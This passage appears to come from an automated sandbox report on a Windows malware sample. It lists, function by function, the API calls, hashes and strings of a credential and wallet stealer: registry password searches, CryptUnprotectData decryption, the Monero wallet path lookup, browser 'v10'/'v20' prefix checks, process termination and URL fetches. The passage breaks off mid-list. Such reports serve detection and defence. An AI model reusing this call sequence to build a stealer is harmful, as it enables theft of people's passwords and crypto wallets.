                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FD5F2A
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FD5F49
                                  • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00FD6014
                                  • memmove.MSVCRT(00000000,00000000,?), ref: 00FD609F
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FD60D0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$memmove
                                  • String ID: invalid string position$string too long
                                  • API String ID: 1975243496-4289949731
                                  • Opcode ID: 13c5b6751a30027bf63ff761354e793ceedf6c5be78741c4a87bc4c8e8e9b826
                                  • Instruction ID: e9013e4a617d7361a0ad79d6ec2e11bbed4eea1c7090a55c2b355f2b946ce1a5
                                  • Opcode Fuzzy Hash: 13c5b6751a30027bf63ff761354e793ceedf6c5be78741c4a87bc4c8e8e9b826
                                  • Instruction Fuzzy Hash: 42617E71B00544DBDB18CF5CC898A6EB7B7EF84704B2C4A1AE492CB781D731ED80AB95
                                  Function 00FCE049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCE06F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FCE07D
                                  • lstrcat.KERNEL32(?,?), ref: 00FCE098
                                  • lstrcat.KERNEL32(?,?), ref: 00FCE0AC
                                  • lstrcat.KERNEL32(?,01B8B838), ref: 00FCE0C0
                                  • lstrcat.KERNEL32(?,?), ref: 00FCE0D4
                                  • lstrcat.KERNEL32(?,01B9D830), ref: 00FCE0E7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCE11F
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00FCE126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$AttributesFile
                                  • String ID:
                                  • API String ID: 3428472996-0
                                  • Opcode ID: 3a31be971edd771af192db322a44dfebcb7aa16448b14ace553784e549882049
                                  • Instruction ID: 803961d99bb1ac5b79a88b322db280501fddbebb59f85eec83c9a25770758c7e
                                  • Opcode Fuzzy Hash: 3a31be971edd771af192db322a44dfebcb7aa16448b14ace553784e549882049
                                  • Instruction Fuzzy Hash: A341BE31D1011C9BCB65EFA4DD49ADD77B8BF88310F4449A8F91AA7240DB389F85AF90
                                  Function 00FB7A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00FB77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FB7805
                                    • Part of subcall function 00FB77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00FB784A
                                    • Part of subcall function 00FB77D0: StrStrA.SHLWAPI(?,Password), ref: 00FB78B8
                                    • Part of subcall function 00FB77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FB78EC
                                    • Part of subcall function 00FB77D0: HeapFree.KERNEL32(00000000), ref: 00FB78F3
                                  • lstrcat.KERNEL32(00000000,00FE4AD4), ref: 00FB7A90
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB7ABD
                                  • lstrcat.KERNEL32(00000000, : ), ref: 00FB7ACF
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB7AF0
                                  • wsprintfA.USER32 ref: 00FB7B10
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB7B39
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB7B47
                                  • lstrcat.KERNEL32(00000000,00FE4AD4), ref: 00FB7B60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                  • String ID: :
                                  • API String ID: 398153587-3653984579
                                  • Opcode ID: e97400a7a02f33e80e4a1c46e8a8bcbddb160b0a29fdf2c50b81547b19ede45b
                                  • Instruction ID: 1e94ab6cfa3fb5dfe605f813d8cba74a9336270df921ecb3851025b423c10117
                                  • Opcode Fuzzy Hash: e97400a7a02f33e80e4a1c46e8a8bcbddb160b0a29fdf2c50b81547b19ede45b
                                  • Instruction Fuzzy Hash: 7B31D772A002189FCB24EFE5D8449EFB7B9EBC4714B144529E515A7204DB34E941EF91
                                  Function 00FC81B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00FC820C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC8243
                                  • lstrlen.KERNEL32(00000000), ref: 00FC8260
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC8297
                                  • lstrlen.KERNEL32(00000000), ref: 00FC82B4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC82EB
                                  • lstrlen.KERNEL32(00000000), ref: 00FC8308
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC8337
                                  • lstrlen.KERNEL32(00000000), ref: 00FC8351
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC8380
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 741fdc6f3a2f599aec05fb679f24ba45c651aca0dc61335b2f083d80863f28df
                                  • Instruction ID: 01e2477425c8fc2d93e9d013684839811ea763166491e1fa34924cfbf81a40e1
                                  • Opcode Fuzzy Hash: 741fdc6f3a2f599aec05fb679f24ba45c651aca0dc61335b2f083d80863f28df
                                  • Instruction Fuzzy Hash: BA51B0719006039BEB24EF69D959BAAB7E8EF00790F014528ED16EB244DB38ED51DBD0
                                  Function 00FB77D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FB7805
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00FB784A
                                  • StrStrA.SHLWAPI(?,Password), ref: 00FB78B8
                                    • Part of subcall function 00FB7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 00FB775E
                                    • Part of subcall function 00FB7750: RtlAllocateHeap.NTDLL(00000000), ref: 00FB7765
                                    • Part of subcall function 00FB7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00FB778D
                                    • Part of subcall function 00FB7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00FB77AD
                                    • Part of subcall function 00FB7750: LocalFree.KERNEL32(?), ref: 00FB77B7
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FB78EC
                                  • HeapFree.KERNEL32(00000000), ref: 00FB78F3
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00FB7A35
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                  • String ID: Password
                                  • API String ID: 356768136-3434357891
                                  • Opcode ID: ae1d2839cedb921e247a23349a63755adc876cf9e99736bef80820bc9a153d1b
                                  • Instruction ID: 06853a19aec8c889a685e722d3e931da58854f006ebd37702542dc7584dfb6ec
                                  • Opcode Fuzzy Hash: ae1d2839cedb921e247a23349a63755adc876cf9e99736bef80820bc9a153d1b
                                  • Instruction Fuzzy Hash: D77141B1D0021DAFDB10DF95CC80ADEBBB8FF49310F144569E509A7200EB75AA85DF91
                                  Function 00FD4500 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 95memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00FC4F39), ref: 00FD4545
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD454C
                                  • wsprintfW.USER32 ref: 00FD455B
                                  • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 00FD45CA
                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00FD45D9
                                  • CloseHandle.KERNEL32(00000000,?,?), ref: 00FD45E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                  • String ID: %hs
                                  • API String ID: 885711575-2783943728
                                  • Opcode ID: c5f8d75536fd7294141a83a086363c38ed7655c37d90c62ef9d790db2d6a1f26
                                  • Instruction ID: 0b23a4f2dd80dcb115da7fc85be6eb963fb10e02fe943822de2c86dc9f16d543
                                  • Opcode Fuzzy Hash: c5f8d75536fd7294141a83a086363c38ed7655c37d90c62ef9d790db2d6a1f26
                                  • Instruction Fuzzy Hash: C431A172A00209BBDB20DBE4DC45FDE77BDAF44710F140165F615EB284EB70AA818BA6
                                  Function 00FB1120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB1135
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB113C
                                  • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00FB1159
                                  • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00FB1173
                                  • RegCloseKey.ADVAPI32(?), ref: 00FB117D
                                  Strings
                                  • wallet_path, xrefs: 00FB116D
                                  • SOFTWARE\monero-project\monero-core, xrefs: 00FB114F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                  • API String ID: 3225020163-4244082812
                                  • Opcode ID: 80206d71a31a06b89fc8857a2c6309b07ba499f7ee703c19830a8d0000613ff9
                                  • Instruction ID: 20076933aa8187de2581079a437885cf9ac6082fcdb26f0589447dac0d824339
                                  • Opcode Fuzzy Hash: 80206d71a31a06b89fc8857a2c6309b07ba499f7ee703c19830a8d0000613ff9
                                  • Instruction Fuzzy Hash: 26F09675640308BBD7249BE19C4DFEA7BBCEB04715F000064FF15E6284D670598497A1
                                  Function 00FB9DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memcmp.MSVCRT(?,v20,00000003), ref: 00FB9E04
                                  • memcmp.MSVCRT(?,v10,00000003), ref: 00FB9E42
                                  • LocalAlloc.KERNEL32(00000040), ref: 00FB9EA7
                                    • Part of subcall function 00FD71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00FD71FE
                                  • lstrcpy.KERNEL32(00000000,00FE4C48), ref: 00FB9FB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpymemcmp$AllocLocal
                                  • String ID: @$v10$v20
                                  • API String ID: 102826412-278772428
                                  • Opcode ID: c61047bf14c6bd6fd2245f3d0a7ae1c5e304d268d8ba52e45ab8f17a3910c14b
                                  • Instruction ID: b8ebf3be39339745a9b74acfc3a2b3371b17a0d74a206db19d4fe60b3535fe53
                                  • Opcode Fuzzy Hash: c61047bf14c6bd6fd2245f3d0a7ae1c5e304d268d8ba52e45ab8f17a3910c14b
                                  • Instruction Fuzzy Hash: D151B631A142099BDB10EFAADC85BDE77A8EF40324F154065F909EB241DBB8ED45AFD0
                                  Function 00FB5640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FB565A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB5661
                                  • InternetOpenA.WININET(00FDCFEC,00000000,00000000,00000000,00000000), ref: 00FB5677
                                  • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00FB5692
                                  • InternetReadFile.WININET(?,?,00000400,00000001), ref: 00FB56BC
                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 00FB56E1
                                  • InternetCloseHandle.WININET(?), ref: 00FB56FA
                                  • InternetCloseHandle.WININET(00000000), ref: 00FB5701
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
